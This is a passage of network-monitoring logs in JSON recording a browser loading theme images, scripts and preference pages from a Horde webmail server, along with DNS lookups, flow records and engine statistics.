{"timestamp":"2020-02-29T00:24:57.254870+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:24:57.255390+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":6}} {"timestamp":"2020-02-29T00:24:57.256235+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:24:57.256649+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":7}} {"timestamp":"2020-02-29T00:24:57.256868+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:24:57.259722+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.260421+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:24:57.260590+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:24:57.261079+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":8}} {"timestamp":"2020-02-29T00:24:57.262825+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.305271+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:24:57.305309+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:24:57.393839+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":9}} {"timestamp":"2020-02-29T00:24:57.394706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:24:57.394760+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.395059+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:24:58.000531+0000","flow_id":943259344790734,"event_type":"flow","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:57.419022+0000","end":"2020-02-29T00:19:57.527637+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:59.000368+0000","flow_id":599515932326705,"event_type":"flow","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:58.719665+0000","end":"2020-02-29T00:19:58.830845+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000883+0000","flow_id":1124622944265220,"event_type":"flow","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":9129,"start":"2020-02-29T00:23:53.222212+0000","end":"2020-02-29T00:23:58.492690+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:59.853152+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":10}} 
{"timestamp":"2020-02-29T00:24:59.853519+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:24:59.968706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":11}} {"timestamp":"2020-02-29T00:24:59.969044+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} 
{"timestamp":"2020-02-29T00:25:00.152171+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":12}} {"timestamp":"2020-02-29T00:25:00.152424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:25:02.195588+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53130,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:25:02.202811+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":2}} {"timestamp":"2020-02-29T00:25:02.203011+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":3}} 
{"timestamp":"2020-02-29T00:25:02.206799+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.308566+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59724,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:02.338773+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":13}} 
{"timestamp":"2020-02-29T00:25:02.400006+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":6}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:02.472424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} 
{"timestamp":"2020-02-29T00:25:02.559671+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":14}} {"timestamp":"2020-02-29T00:25:02.561541+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:25:02.568769+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":15}} 
{"timestamp":"2020-02-29T00:25:02.609536+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:25:03.000163+0000","event_type":"stats","stats":{"uptime":15155,"capture":{"kernel_packets":140642,"kernel_drops":0},"decoder":{"pkts":140790,"bytes":96640184,"invalid":195,"ipv4":139205,"ipv6":10,"ethernet":140790,"raw":0,"null":0,"sll":0,"tcp":133643,"udp":5352,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088704},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2447,"failed_udp":116},"tx":{"http":4955,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2531}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2
530,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:05.000558+0000","flow_id":811820461074107,"event_type":"flow","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:04.468667+0000","end":"2020-02-29T00:20:04.579983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:06.898313+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36277,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39043,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:06.930810+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":16}} 
{"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:07.094400+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 